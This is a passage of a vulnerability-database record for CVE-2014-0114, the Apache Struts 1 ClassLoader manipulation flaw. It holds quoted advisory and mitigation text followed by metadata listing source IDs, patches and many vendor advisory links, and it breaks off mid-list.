3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. \n\nThanks to the efforts of Alvaro Munoz and the HP Fortify team, the\nApache Struts project team can recommend a first mitigation that is\nrelatively simple to apply. It involves the introduction of a generic\nServlet filter, adding the possibility to blacklist unacceptable request\nparameters based on regular expressions. Please see the corresponding HP\nFortify blog entry [2] for detailed instructions. Based\non this information, the Apache Struts project team recommends to apply\nthe mitigation advice *immediately* for all Struts 1 based applications. \n\nStruts 1 has had its End-Of-Life announcement more than one year ago\n[3]. However, in a cross project effort the Struts team is looking for a\ncorrection or an improved mitigation path. Please stay tuned for further\ninformation regarding a solution. \n\nThis is a cross-list posting. If you have questions regarding this\nreport, please direct them to security@struts.apache.org only. \n\n[1] http://struts.apache.org/release/2.3.x/docs/s2-021.html\n[2]\nhttp://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.U2J7xeaSxro\n[3] http://struts.apache.org/struts1eol-announcement.html\n\n-- \nRen\\xe9 Gielen\nhttp://twitter.com/rgielen\n", sources: [ { db: "NVD", id: "CVE-2014-0114", }, { db: "BID", id: "67121", }, { db: "VULMON", id: "CVE-2014-0114", }, { db: "PACKETSTORM", id: "149311", }, { db: "PACKETSTORM", id: "126619", }, { db: "PACKETSTORM", id: "126692", }, { db: "PACKETSTORM", id: "149050", }, { db: "PACKETSTORM", id: "127868", }, { db: "PACKETSTORM", id: "137980", }, { db: "PACKETSTORM", id: "154792", }, { db: "PACKETSTORM", id: "128873", }, { db: "PACKETSTORM", id: "139721", }, { db: "PACKETSTORM", id: "126455", }, ], trust: 2.16, }, exploit_availability: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { reference: "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=41690", trust: 0.1, type: "exploit", }, ], sources: [ { db: "VULMON", id: "CVE-2014-0114", }, ], }, external_ids: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { db: "NVD", id: "CVE-2014-0114", trust: 3, }, { db: "BID", id: "67121", trust: 1.9, }, { db: "SECUNIA", id: "59118", trust: 1.6, }, { db: "SECUNIA", id: "59480", trust: 1.6, }, { db: "SECUNIA", id: "59246", trust: 1.6, }, { db: "SECUNIA", id: "60177", trust: 1.6, }, { db: "SECUNIA", id: "59479", trust: 1.6, }, { db: "SECUNIA", id: "58710", trust: 1.6, }, { db: "SECUNIA", id: "59718", trust: 1.6, }, { db: "SECUNIA", id: "59430", trust: 1.6, }, { db: "SECUNIA", id: "59464", trust: 1.6, }, { db: "SECUNIA", id: "58851", trust: 1.6, }, { db: "SECUNIA", id: "59228", trust: 1.6, }, { db: "SECUNIA", id: "59704", trust: 1.6, }, { db: "SECUNIA", id: "59014", trust: 1.6, }, { db: "SECUNIA", id: "57477", trust: 1.6, }, { db: "SECUNIA", id: "59245", trust: 1.6, }, { db: "SECUNIA", id: "58947", trust: 1.6, }, { db: "SECUNIA", id: "60703", trust: 1.6, }, { db: "OPENWALL", id: "OSS-SECURITY/2014/07/08/1", trust: 1.6, }, { db: "OPENWALL", id: "OSS-SECURITY/2014/06/15/10", trust: 1.6, }, { db: "HITACHI", id: "HS14-018", trust: 0.9, }, { db: "HITACHI", id: "HS14-020", trust: 0.9, }, { db: "JUNIPER", id: "JSA10643", trust: 0.9, }, { db: "JVN", id: "JVN30962312", trust: 0.9, }, { db: "CS-HELP", id: "SB2022072128", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.1427", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.1089", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.3134", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.2355", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.0544", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2019.2568", trust: 0.6, }, { db: "AUSCERT", id: "ESB-2020.2293.2", trust: 0.6, }, { db: "ICS CERT", id: "ICSMA-20-184-01", trust: 0.6, }, { db: "CNNVD", id: "CNNVD-201404-581", trust: 0.6, }, { db: "VULMON", id: "CVE-2014-0114", trust: 0.1, }, { db: "PACKETSTORM", id: "149311", trust: 0.1, }, { db: "PACKETSTORM", id: "126619", trust: 0.1, }, { db: "PACKETSTORM", id: "126692", trust: 0.1, }, { db: "PACKETSTORM", id: "149050", trust: 0.1, }, { db: "PACKETSTORM", id: "127868", trust: 0.1, }, { db: "PACKETSTORM", id: "137980", trust: 0.1, }, { db: "PACKETSTORM", id: "154792", trust: 0.1, }, { db: "PACKETSTORM", id: "128873", trust: 0.1, }, { db: "PACKETSTORM", id: "139721", trust: 0.1, }, { db: "PACKETSTORM", id: "126455", trust: 0.1, }, ], sources: [ { db: "VULMON", id: "CVE-2014-0114", }, { db: "BID", id: "67121", }, { db: "PACKETSTORM", id: "149311", }, { db: "PACKETSTORM", id: "126619", }, { db: "PACKETSTORM", id: "126692", }, { db: "PACKETSTORM", id: "149050", }, { db: "PACKETSTORM", id: "127868", }, { db: "PACKETSTORM", id: "137980", }, { db: "PACKETSTORM", id: "154792", }, { db: "PACKETSTORM", id: "128873", }, { db: "PACKETSTORM", id: "139721", }, { db: "PACKETSTORM", id: "126455", }, { db: "CNNVD", id: "CNNVD-201404-581", }, { db: "NVD", id: "CVE-2014-0114", }, ], }, id: "VAR-201404-0288", iot: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: true, sources: [ { db: "VARIoT devices database", id: null, }, ], trust: 0.4253262875, }, last_update_date: "2024-11-29T21:26:04.405000Z", patch: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { title: "struts-1.2.9-4jpp.8.el5_10.src", trust: 0.6, url: "http://123.124.177.30/web/xxk/bdxqById.tag?id=49743", }, { title: "Red Hat: Important: Red Hat A-MQ Broker 7.5 release and security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20192995 - Security Advisory", }, { title: "Debian CVElist Bug Report Logs: libstruts1.2-java: CVE-2014-0114", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs&qid=96f4091aa31a0ece729fdcb110066df5", }, { title: "Red Hat: CVE-2014-0114", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2014-0114", }, { title: "Red Hat: Important: Fuse 7.1 security update", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20182669 - Security Advisory", }, { title: "IBM: IBM Security Bulletin: Multiple Security Vulnerabilities have been fixed in IBM Security Privileged Identity Manager Appliance.", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=f5bb2b180c7c77e5a02747a1f31830d9", }, { title: "Oracle: Oracle Critical Patch Update Advisory - January 2019", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=f655264a6935505d167bbf45f409a57b", }, { title: "Oracle: Oracle Critical Patch Update Advisory - October 2018", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=81c63752a6f26433af2128b2e8c02385", }, { title: "Oracle: Oracle Critical Patch Update Advisory - January 2018", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=e2a7f287e9acc8c64ab3df71130bc64d", }, { title: "IBM: IBM Security Bulletin: IBM has announced a release for IBM Security Identity Governance and Intelligence in response to multiple security vulnerabilities", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=55ea315dfb69fce8383762ac64250315", }, { title: "Oracle: Oracle Critical Patch Update Advisory - April 2017", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=143b3fb255063c81571469eaa3cf0a87", }, { title: "Oracle: Oracle Critical Patch Update Advisory - October 2017", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=523d3f220a64ff01dd95e064bd37566a", }, { title: "IBM: Security Bulletin: Netcool Operations Insight v1.6.6 contains fixes for multiple security vulnerabilities.", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=68c6989b84f14aaac220c13b754c7702", }, { title: "Oracle: Oracle Critical Patch Update Advisory - January 2015", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=4a692d6d60aa31507cb101702b494c51", }, { title: "Oracle: Oracle Critical Patch Update Advisory - October 2016", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=05aabe19d38058b7814ef5514aab4c0c", }, { title: "Oracle: Oracle Critical Patch Update Advisory - July 2018", trust: 0.1, url: "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories&qid=5f8c525f1408011628af1792207b2099", }, { title: "struts1-patch", trust: 0.1, url: "https://github.com/ricedu/struts1-patch ", }, { title: "", trust: 0.1, url: "https://github.com/weblegacy/struts1 ", }, { title: "struts1filter", trust: 0.1, url: "https://github.com/rgielen/struts1filter ", }, { title: "StrutsExample", trust: 0.1, url: "https://github.com/vikasvns2000/StrutsExample ", }, { title: "struts-mini", trust: 0.1, url: "https://github.com/bingcai/struts-mini ", }, { title: "strutt-cve-2014-0114", trust: 0.1, url: "https://github.com/anob3it/strutt-cve-2014-0114 ", }, { title: "super-pom", trust: 0.1, url: "https://github.com/ian4hu/super-pom ", }, ], sources: [ { db: "VULMON", id: "CVE-2014-0114", }, { db: "CNNVD", id: "CNNVD-201404-581", }, ], }, problemtype_data: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { problemtype: "CWE-20", trust: 1, }, ], sources: [ { db: "NVD", id: "CVE-2014-0114", }, ], }, references: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: [ { trust: 2.8, url: "http://www.securityfocus.com/bid/67121", }, { trust: 2.5, url: "http://www.vmware.com/security/advisories/vmsa-2014-0008.html", }, { trust: 2.2, url: "http://www.vmware.com/security/advisories/vmsa-2014-0012.html", }, { trust: 2.2, url: "http://www.debian.org/security/2014/dsa-2940", }, { trust: 2.2, url: "http://www.ibm.com/support/docview.wss?uid=swg21675496", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg27042296", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html", }, { trust: 1.9, url: "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/topics/security/cpujul2014-1972956.html", }, { trust: 1.9, url: "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/topics/security/cpuoct2014-1972960.html", }, { trust: 1.9, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21676303", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675266", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21676110", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21677110", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675689", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674812", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674128", }, { trust: 1.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675972", }, { trust: 1.7, url: "https://access.redhat.com/errata/rhsa-2018:2669", }, { trust: 1.7, url: "http://advisories.mageia.org/mgasa-2014-0219.html", }, { trust: 1.7, url: "https://security.gentoo.org/glsa/201607-09", }, { trust: 1.7, url: "https://access.redhat.com/errata/rhsa-2019:2995", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/918ec15a80fc766ff46c5d769cb8efc88fed6674faadd61a7105166b%40%3cannounce.apache.org%3e", }, { trust: 1.6, url: "http://openwall.com/lists/oss-security/2014/06/15/10", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/31f9dc2c9cb68e390634a4202f84b8569f64b6569bfcce46348fd9fd%40%3ccommits.commons.apache.org%3e", }, { trust: 1.6, url: "https://issues.apache.org/jira/browse/beanutils-463", }, { trust: 1.6, url: "http://secunia.com/advisories/57477", }, { trust: 1.6, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675898", }, { trust: 1.6, url: "http://openwall.com/lists/oss-security/2014/07/08/1", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/40fc236a35801a535cd49cf1979dbeab034b833c63a284941bce5bf1%40%3cdev.commons.apache.org%3e", }, { trust: 1.6, url: "https://security.netapp.com/advisory/ntap-20140911-0001/", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/c24c0b931632a397142882ba248b7bd440027960f22845c6f664c639%40%3ccommits.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/6b30629b32d020c40d537f00b004d281c37528d471de15ca8aec2cd4%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59430", }, { trust: 1.6, url: "http://seclists.org/fulldisclosure/2014/dec/23", }, { trust: 1.6, url: "http://secunia.com/advisories/58851", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/fda473f46e51019a78ab217a7a3a3d48dafd90846e75bd5536ef72f3%40%3cnotifications.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59704", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/3f500972dceb48e3cb351f58565aecf6728b1ea7a69593af86c30b30%40%3cissues.activemq.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/d27c51b3c933f885460aa6d3004eb228916615caaaddbb8e8bfeeb40%40%3cgitbox.activemq.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f%40%3cdev.drill.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/r75d67108e557bb5d4c4318435067714a0180de525314b7e8dab9d04e%40%3cissues.activemq.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/0efed939139f5b9dcd62b8acf7cb8a9789227d14abdc0c6f141c4a4c%40%3cissues.activemq.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59480", }, { trust: 1.6, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21676091", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/0a35108a56e2d575e3b3985588794e39fbf264097aba66f4c5569e4f%40%3cuser.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59246", }, { trust: 1.6, url: "http://secunia.com/advisories/59245", }, { trust: 1.6, url: "http://secunia.com/advisories/59479", }, { trust: 1.6, url: "http://secunia.com/advisories/59118", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/6afe2f935493e69a332b9c5a4f23cafe95c15ede1591a492cf612293%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://apache-ignite-developers.2346864.n4.nabble.com/cve-2014-0114-apache-ignite-is-vulnerable-to-existing-cve-2014-0114-td31205.html", }, { trust: 1.6, url: "http://secunia.com/advisories/58947", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/42ad6326d62ea8453d0d0ce12eff39bbb7c5b4fca9639da007291346%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/88c497eead24ed517a2bb3159d3dc48725c215e97fe7a98b2cf3ea25%40%3cdev.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/r458d61eaeadecaad04382ebe583230bc027f48d9e85e4731bc573477%40%3ccommits.dolphinscheduler.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/97fc033dad4233a5d82fcb75521eabdd23dd99ef32eb96f407f96a1a%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://bugzilla.redhat.com/show_bug.cgi?id=1091938", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc%40%3cissues.drill.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/aa4ca069c7aea5b1d7329bc21576c44a39bcc4eb7bb2760c4b16f2f6%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://lists.fedoraproject.org/pipermail/package-announce/2014-august/136958.html", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/956995acee0d8bc046f1df0a55b7fbeb65dd2f82864e5de1078bacb0%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/1f78f1e32cc5614ec0c5b822ba4bd7fc8e8b5c46c8e038b6bd609cb5%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59014", }, { trust: 1.6, url: "https://bugzilla.redhat.com/show_bug.cgi?id=1116665", }, { trust: 1.6, url: "http://secunia.com/advisories/58710", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/1565e8b786dff4cb3b48ecc8381222c462c92076c9e41408158797b5%40%3ccommits.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/ffde3f266d3bde190b54c9202169e7918a92de7e7e0337d792dc7263%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/65b39fa6d700e511927e5668a4038127432178a210aff81500eb36e5%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675387", }, { trust: 1.6, url: "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html", }, { trust: 1.6, url: "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html", }, { trust: 1.6, url: "http://www.securityfocus.com/archive/1/534161/100/0/threaded", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442%40%3cdev.drill.apache.org%3e", }, { trust: 1.6, url: "http://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/release-notes.txt", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/cee6b1c4533be1a753614f6a7d7c533c42091e7cafd7053b8f62792a%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59464", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/4c3fd707a049bfe0577dba8fc9c4868ffcdabe68ad86586a0a49242e%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/09981ae3df188a2ad1ce20f62ef76a5b2d27cf6b9ebab366cf1d6cc6%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/df093c662b5e49fe9e38ef91f78ffab09d0839dea7df69a747dffa86%40%3cdev.commons.apache.org%3e", }, { trust: 1.6, url: "https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05324755", }, { trust: 1.6, url: "http://marc.info/?l=bugtraq&m=140119284401582&w=2", }, { trust: 1.6, url: "http://marc.info/?l=bugtraq&m=141451023707502&w=2", }, { trust: 1.6, url: "http://secunia.com/advisories/59228", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/37e1ed724a1b0e5d191d98c822c426670bdfde83804567131847d2a3%40%3cdevnull.infra.apache.org%3e", }, { trust: 1.6, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21676931", }, { trust: 1.6, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21676375", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/f3682772e62926b5c009eed63c62767021be6da0bb7427610751809f%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/60177", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/708d94141126eac03011144a971a6411fcac16d9c248d1d535a39451%40%3csolr-user.lucene.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/15fcdf27fa060de276edc0b4098526afc21c236852eb3de9be9594f3%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/df1c385f2112edffeff57a6b21d12e8d24031a9f578cb8ba22a947a8%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://www.mandriva.com/security/advisories?name=mdvsa-2014:095", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/098e9aae118ac5c06998a9ba4544ab2475162981d290fdef88e6f883%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/2ba22f2e3de945039db735cf6cbf7f8be901ab2537337c7b1dd6a0f0%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/0340493a1ddf3660dee09a5c503449cdac5bec48cdc478de65858859%40%3cdev.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/r204ba2a9ea750f38d789d2bb429cc0925ad6133deea7cbc3001d96b5%40%3csolr-user.lucene.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/60703", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/ebc4f019798f6ce2a39f3e0c26a9068563a9ba092cdf3ece398d4e2f%40%3cnotifications.commons.apache.org%3e", }, { trust: 1.6, url: "http://secunia.com/advisories/59718", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/080af531a9113e29d3f6a060e3f992dc9f40315ec7234e15c3b339e3%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/9317fd092b257a0815434b116a8af8daea6e920b6673f4fd5583d5fe%40%3ccommits.druid.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/9b5505632f5683ee17bda4f7878525e672226c7807d57709283ffa64%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/66176fa3caeca77058d9f5b0316419a43b4c3fa2b572e05b87132226%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/c70da3cb6e3f03e0ad8013e38b6959419d866c4a7c80fdd34b73f25c%40%3ccommits.pulsar.apache.org%3e", }, { trust: 1.6, url: "http://marc.info/?l=bugtraq&m=140801096002766&w=2", }, { trust: 1.6, url: "https://security.netapp.com/advisory/ntap-20180629-0006/", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/rf5230a049d989dbfdd404b4320a265dceeeba459a4d04ec21873bd55%40%3csolr-user.lucene.apache.org%3e", }, { trust: 1.6, url: "https://access.redhat.com/solutions/869353", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/869c08899f34c1a70c9fb42f92ac0d043c98781317e0c19d7ba3f5e3%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/c7e31c3c90b292e0bafccc4e1b19c9afc1503a65d82cb7833dfd7478%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/2454e058fd05ba30ca29442fdeb7ea47505d47a888fbc9f3a53f31d0%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/8e2bdfabd5b14836aa3cf900aa0a62ff9f4e22a518bb4e553ebcf55f%40%3cissues.commons.apache.org%3e", }, { trust: 1.6, url: "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html", }, { trust: 1.6, url: "https://lists.apache.org/thread.html/084ae814e69178d2ce174cfdf149bc6e46d7524f3308c08d3adb43cb%40%3cissues.commons.apache.org%3e", }, { trust: 1.2, url: "https://rhn.redhat.com/errata/rhsa-2014-0497.html", }, { trust: 1, url: "https://rhn.redhat.com/errata/rhsa-2014-0498.html", }, { trust: 1, url: "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05324755", }, { trust: 1, url: "http://struts.apache.org/release/2.3.x/docs/s2-021.html", }, { trust: 1, url: "https://nvd.nist.gov/vuln/detail/cve-2014-0114", }, { trust: 0.9, url: "http://www.liferay.com/community/security-team/known-vulnerabilities/-/asset_publisher/t8ei/content/cst-sa-lps-46552-struts-1-classloader-manipulation", }, { trust: 0.9, url: "http://kb.juniper.net/infocenter/index?page=content&id=jsa10643&cat=sirt_1&actp=list", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674435", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674428", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21674937", }, { trust: 0.9, url: "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04311273", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21675822", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673663", }, { trust: 0.9, url: "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-018/index.html", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21672316", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21676375", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673098", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673944", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673101", }, { trust: 0.9, url: "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04399728", }, { trust: 0.9, url: "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04473828", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61061", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21680848", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21676646", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg27042186", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg27042185", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg27042184", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61039", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg1iv61058", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037507", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21678830", }, { trust: 0.9, url: "http://www.hitachi.co.jp/prod/comp/soft1/global/security/info/vuls/hs14-020/index.html", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037825", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037409", }, { trust: 0.9, url: "http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg24037506", }, { trust: 0.9, url: "https://rhn.redhat.com/errata/rhsa-2014-0500.html", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004807", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21673757", }, { trust: 0.9, url: "https://www-304.ibm.com/support/docview.wss?uid=swg21673508", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673695", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674099", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674104", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673992", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21674110", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673982", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21673422", }, { trust: 0.9, url: "http://www-01.ibm.com/support/docview.wss?uid=swg21678359", }, { trust: 0.9, url: 